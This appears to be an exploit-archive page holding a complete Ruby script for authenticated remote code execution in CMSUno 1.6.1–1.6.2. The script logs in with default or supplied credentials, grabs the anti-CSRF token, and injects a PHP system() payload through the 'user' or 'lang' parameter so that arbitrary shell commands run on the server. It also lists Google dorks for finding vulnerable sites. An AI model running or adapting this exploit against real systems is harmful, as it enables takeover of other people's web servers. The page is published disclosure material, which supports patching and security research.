CMSUno 1.6.2 Remote Code Execution

CMSUno 1.6.2 Remote Code Execution: Posted Jan 28, 2021; Authored by Alexandre Zanni; CMSUno version 1.6.2 authenticated remote code execution exploit. The original discovery for the vulnerability leveraged is attributed to Fatih Celik in November of 2020.; tags | exploit, remote, code execution; advisories | CVE-2020-25538, CVE-2020-25557; SHA-256 | 2477146e721d33c19e7c9e103dfd83b0cfc4343413f007eb0260e88e64259065; Download | Favorite | View

CMSUno 1.6.2 Remote Code Execution

#!/usr/bin/env ruby

# Exploit
## Title: CMSUno 1.6.1 <= 1.6.2 - Remote Code Execution (Authenticated)
## Google Dorks:
##   inurl:uno/central.php
##   inurl:uno/config.php
##   inurl:uno.php intitle:"CMSUno - Login"
## Author: noraj (Alexandre ZANNI) for SEC-IT (https://secit.fr)
## Author website: https://pwn.by/noraj/
## Date: 2021-01-15
## Vendor Homepage: https://www.boiteasite.fr/cmsuno.html
## Software Link: https://github.com/boiteasite/cmsuno/archive/1.6.2.tar.gz
## Version: 1.6.1, 1.6.2
## Tested on: Bludit
## - 1.6.3 ❌
## - 1.6.2 ✅
## - 1.6.1 ✅
## - 1.6.0 ❌
## - 1.5.7 ❌
## Patch: Update to 1.6.3

# Vulnerabilities
## Discoverer: Fatih Çelik
## Date: 2020/09/30
## Discoverer website: https://fatihhcelik.blogspot.com
## Discovered on CMSUno 1.6.2 and tested on Kali Linux 2020.2
## Vulnerability 1:
##   Title: CMSUno 1.6.2 - 'user' Remote Code Execution (Authenticated)
##   CVE: CVE-2020-25557
##   References: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution.html
## Vulnerability 2:
##   Title: CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated)
##   CVE: CVE-2020-25538
##   References: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution_30.html

require 'httpclient'
require 'docopt'

# username = 'cmsuno'
# password = '654321'
# root_url = 'http://localhost:5000/'
# command = 'pwd'

doc = <<~DOCOPT
  CMSUno 1.6.1 <= 1.6.2 - Remote Code Execution (Authenticated)

  Usage:
    #{__FILE__} -r <url> -c <cmd> [-u <username>] [-p <password>] [-t <tech>] [--debug]
    #{__FILE__} -H | --help

  Options:
    -r <url>, --root-url <url>            Root URL (base path) including HTTP scheme, port and root folder
    -u <username>, --user <username>      user name (if not default: cmsuno)
    -p <password>, --pass <password>      User password (if not default: 654321)
    -c <cmd>, --command <cmd>             Command to execute on the target
    -t <tehc>, --technique <tech>         Technique: exploiting 'user' param (default, with output) or 'lang' param (blind)
    --debug                               Display arguments
    -h, --help                            Show this screen

  Examples:
    #{__FILE__} -r http://example.org -c id
    #{__FILE__} -r https://example.org:5000/cmsuno -c 'touch hackproof' -u john -p admin1234 -t lang
DOCOPT

# Get anti-CSRF token
def get_unox(client, auth_status)
  print '[*] Fetching anti-CSRF token: '
  res = client.get(LOGIN_URL)
  case auth_status
  when false
    regexp = /name="unox" value="([a-f0-9]{32}?)"/
  when true
    regexp = /Unox='([a-f0-9]{32}?)'/
  end
  token = regexp.match(res.body).captures[0].chomp
  puts token
  return token
end

def login(client, user, pass)
  data = {
    'unox' => get_unox(client, false),
    'user' => user,
    'pass' => pass,
  }
  puts '[*] Logging in'
  res = client.post(LOGIN_URL, data)
  return res.body
end

def exploit(client, user, pass, cmd, tech)
  payload = "#{user}\";$pass='#{pass}';system('#{cmd}');?>// "
  case tech
  when 'user'
    data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=#{user}&pass0=#{pass}&user=#{payload}&pass=#{pass}&lang=en"
  when 'lang'
    data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=&pass0=&user=&pass=&lang=#{payload}"
  else
    raise 'Wrong exploitation technique argument value'
  end
  headers = {
    'X-Requested-With' => 'XMLHttpRequest'
  }
  #client.proxy = 'http://localhost:8080'
  puts "[*] Starting exploitation, using '#{tech}' param technique"
  client.post(VULNERABLE_URL, data, headers)
  # Login again to trigger uno/password.php
  clnt2 = HTTPClient.new
  return login(clnt2, user, pass).lines[..-2].join
end

begin
  args = Docopt.docopt(doc)
  pp args if args['--debug']

  username = args['--user'] || 'cmsuno'
  password = args['--pass'] || '654321'
  technique = args['--technique'] || 'user'
  LOGIN_URL = "#{args['--root-url']}/uno.php"
  VULNERABLE_URL = "#{args['--root-url']}/uno/central.php"

  clnt = HTTPClient.new
  login(clnt, username, password)
  output = exploit(clnt, username, password, args['--command'], technique)
  print '[*] Command output:'
  case technique
  when 'user'
    puts "\n#{output}"
  when 'lang'
    puts ' blind RCE, no output with this exploitation technique'
  end
rescue Docopt::Exit => e
  puts e.message
end

Top Authors In Last 30 Days

Red Hat 288 files
Ubuntu 93 files
Gentoo 29 files
indoushka 26 files
Debian 13 files
Sina Kheirkhah 7 files
tmrswrr 7 files
Rodolfo Tavares 4 files
S. Dietz 2 files
jheysel-r7 2 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,082)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,527)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,402)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,689)
UNIX (9,431)
UnixWare (187)
Windows (6,667)
Other

CMSUno 1.6.2 Remote Code Execution

CMSUno 1.6.2 Remote Code Execution

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

CMSUno 1.6.2 Remote Code Execution

Share This

CMSUno 1.6.2 Remote Code Execution

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems